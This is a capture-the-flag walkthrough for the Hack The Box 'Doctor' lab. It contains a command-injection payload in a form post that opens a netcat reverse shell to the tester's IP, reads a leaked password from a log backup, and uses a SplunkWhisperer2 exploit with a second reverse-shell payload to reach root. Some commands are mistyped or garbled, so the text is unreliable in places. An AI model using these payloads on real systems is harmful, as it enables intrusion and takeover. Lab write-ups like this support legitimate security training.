Doctor Walkthrough Hack The Box
Labs IP:- 10.10.10.209
First of all open your terminal and type “ping 10.10.10.209” if you see response this means your connection is working and you can start your work.
Now open your terminal and if it’s not super user/root than switch to super su/root using “Sudo Su” , after when you gain super su privilage type :- “nano /etc/hosts” your scree will like this:-
Type “10.10.10.209”(space) Doctors.htb this will add “10.10.10.209” to your local network and you can access it by typing Doctos.htb in your browser. After typing that press “Ctrl + o” this will overwrite the file and press “Ctrl +x” to exit.
Now open your browser and type Doctors.htb your screen be like:-
Now go to Register at top right corner and click on it and fill any details to create a login id.
Click on signup, your account will be created and than login in your account using same credentials, after login your screen be like:-
Now to go to New Message at top right your sceen will like:-
Now open your terminal and type “nc -nlvp 1234” (any port you can use) this NetCat command will allow to l234 to listen to our request:-
Now in new terminal type “ifconfig” to see your IP address check your IP over tun0 this the IP provided by Hack The Box as we are coonected to VPN of Hack The Box our IP is diiferent so check your IP over tun0 and select it and copy that IP.
Now open your browser and type in Title “Getting Shell” and in Content type:- “<img src=http://10.10.14.33/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.33'$IFS'1234')>” here “10.10.14.44” is my VPN IP type your IP over here, after you click on Post on terminal where we have use NetCat commant you will see “Connect to (Your IP) from unknown”
Now type :- “ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ ” after this command you will able to access “web@doctor”
Now type cd .. it will take you to the “home” directory, check what’s inside it using “ls” , (shaun,web) :-
Now use “cd /var/log/apache2” to got inside “apache2” folder here type “ls” to see list of things present inside “apache2”, here you will see a file name “backup”
Let’s check what inside “backup” by using command “cat backup”, screen will be full of different things, now we have to find email and password for login, lets type “grep -r password?email” , “grep” is used to search for a string of characters in a specified file, “-r” is used to specify what we have to find.
After this command a line will appear in which we have our password:- “Guitar123”
Now let’s login in super user of web@doctor using “su shaun” , after this it will ask for password , type the password will get above”Guitar123",
Now you can see “web@doctor” change to “shaun@doctor” and now lets go back using “cd /home/shaun”, here type “ls” to see files inside it, we can see user.txt , lets try to see what’s inside it using “ sudo -l” this command will show details of each file inside the “shaun” folder, it will ask for password , Enter :- “Guitar123” , after this it will show an error as we can access it , now will have use another method for it.:-
Now lets do a scan on “10.10.10.209” using nmap, type “nmap -sC -sV -A -o scan.txt 10.10.10.209” this command will save a file name “scan.txt” in our home directory , this will show which script we can use to get access:-
Open “scan.txt”
Here we can see “Splunk” let’s search it on google, type “Splunk privilege escalation” you will see a github link at top click on it and copy the profile usrl and clone it using “git clone :- url”, now let’s access this folder , in a new terminal type “cd SplunkWhisperer2” :-
Now type “cd PysplunkWhishperer2” and press Enter, in here there a program written in python which we will use to get our flag, but first of all we require to fullfill the requirement of the program, this can be done using command call “pip”, it allows you to install and manage additional libraries and dependencies that are not distributed as part of the standard library, now type “pip install -r requirement.txt” this might take time, depending on your interent connection :-
As it’s installing the requirement, open a new terminal , we will have to create another port for listerning to access the flag, type “nc -nlvp 1232”(any port you can use except the previous one(1234))
Now the isntall have completed, now type the following command to gain access :- “sudo(root privilage is necessary) python3 PySplunkWhisperer2_remote.py — host 10.10.10.209 — lhost 10.10.14.33(Your VPN IP) — username shaun — paswword Guiter 123 — payload ‘nc.traditional -r/bin/sh ‘10.10.14.33’(Your VPN IP) ‘1232’’(Your port which you used) and than press enter:-
Now on that terminal in which we used NetCat we will see “connect to (IP) from (unknown) , now type “python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ ” , now press enter , you will see you have now access to “root@doctor” now lets go to “root” type “ cd root” :-
Type “ls” here, you will see “root.txt” in this text file we will see our flag, which can be seen using command :- “cat root.txt”, you will get your flag.
Thank You for Reading
Please Share your view 🙂
